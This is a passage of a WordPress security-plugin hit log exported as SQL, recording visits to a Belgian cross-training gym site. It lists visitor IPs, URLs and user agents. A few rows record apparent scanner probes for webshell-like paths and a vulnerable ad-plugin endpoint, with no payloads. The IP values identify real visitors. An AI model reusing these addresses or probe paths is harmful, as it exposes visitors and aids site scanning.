(73384, 1495477976.503942, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73385, 1495477977.032297, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73386, 1495477977.558634, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73387, 1495477978.043860, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73388, 1495477978.781048, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73389, 1495478866.394084, 1374843811, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73390, 1495478867.554257, 1374843811, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73391, 1495478870.694757, 1374843811, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73392, 1495478876.294593, 1374843811, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73393, 1495478878.529719, 1374843811, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(73394, 1495481799.248182, 1538567300, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73395, 1495481813.493195, 1538567300, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73396, 1495481816.022588, 1538567300, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73397, 1495481821.300455, 1538567300, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G928F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(73398, 1495485226.263375, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73399, 1495485230.295351, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73400, 1495485245.031070, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73401, 1495485249.192076, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73402, 1495485253.784632, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73403, 1495485258.641395, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73404, 1495485263.413707, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73405, 1495485268.187167, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(73406, 1495485649.842721, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73407, 1495485650.954757, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73408, 1495485651.454379, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73409, 1495485651.868503, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73410, 1495485652.653348, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(73411, 1495485653.148925, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73412, 1495485653.666458, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73413, 1495485654.218341, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73414, 1495485654.700848, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73415, 1495485655.213125, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73416, 1495485655.701996, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73417, 1495485656.169566, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73418, 1495485656.584569, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73419, 1495485657.048101, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73420, 1495486698.584527, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73421, 1495490057.080179, 3161848526, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/infos.php', 'http://crosstrainingcenter.be/infos.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73422, 1495491078.880470, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(73423, 1495494340.784534, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73424, 1495512105.232271, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73425, 1495517288.939338, 3652617308, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73426, 1495517308.497323, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73427, 1495525214.767366, 2366145562, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73428, 1495536195.365821, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/eg.php', 'http://www.crosstrainingcenter.be/eg.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(73429, 1495539593.111145, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73430, 1495539595.031286, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73431, 1495546600.187515, 3154495934, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73432, 1495546603.643507, 3154495934, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73433, 1495546604.773377, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73434, 1495546605.733491, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73435, 1495546606.432207, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73436, 1495546607.193760, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73437, 1495546609.752597, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73438, 1495546610.289599, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73439, 1495546611.054213, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73440, 1495546611.609937, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73441, 1495546612.300779, 3154495934, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73442, 1495547792.505264, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(73443, 1495550349.404214, 1815808080, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73444, 1495550354.834594, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73445, 1495550356.968242, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73446, 1495550364.719377, 1815808080, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(73447, 1495556358.329172, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73448, 1495556358.933810, 2637637398, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73449, 1495556391.040551, 2503517245, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0'),
(73450, 1495568689.310138, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73451, 1495568689.918602, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73452, 1495568690.486252, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73453, 1495568691.011755, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73454, 1495568691.581053, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73455, 1495568692.059089, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73456, 1495568692.698568, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73457, 1495568693.260677, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73458, 1495568693.800975, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73459, 1495568694.408511, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73460, 1495568694.926953, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73461, 1495572416.470849, 1538608887, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://m.facebook.com/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-J510FN Build/MMB29M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/124.0.0.22.66;]'),
(73462, 1495573237.814621, 2760155467, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(73463, 1495575943.512807, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73464, 1495575944.005073, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73465, 1495575944.796819, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73466, 1495575946.763035, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73467, 1495575947.267470, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73468, 1495575947.682675, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73469, 1495575948.116226, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73470, 1495575948.575066, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73471, 1495575949.016243, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73472, 1495575949.444437, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73473, 1495575950.009268, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73474, 1495575950.780751, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73475, 1495575951.243507, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73476, 1495575951.698849, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73477, 1495592510.317584, 3024883617, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73478, 1495592677.131647, 3192595645, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-admin/includes/rnnvhs.php', 'http://crosstrainingcenter.be/wp-admin/includes/rnnvhs.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(73479, 1495599617.761028, 2637637400, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(73480, 1495601020.683634, 1123633555, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73481, 1495601021.224079, 1123633555, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(73482, 1495622818.768484, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php', 'http://crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(73483, 1495625687.334806, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(73484, 1495625687.892436, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73485, 1495625688.328426, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73486, 1495625688.785413, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73487, 1495625689.233464, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73488, 1495625689.757271, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73489, 1495625690.251584, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73490, 1495625690.754117, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73491, 1495625691.220333, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73492, 1495625691.666291, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73493, 1495625692.137367, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(73494, 1495632991.997086, 3024883461, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(73495, 1495633664.274326, 1570674747, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(73496, 1495633767.197490, 786801765, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(73497, 1495637411.260045, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(73498, 1495647073.615559, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(73499, 1495647074.506264, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73500, 1495647075.208526, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73501, 1495647075.717230, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73502, 1495647076.385393, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73503, 1495647076.894932, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73504, 1495647077.857004, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73505, 1495647078.965712, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(73506, 1495647079.766453, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73507, 1495647080.440887, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(73508, 1495647080.927837, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
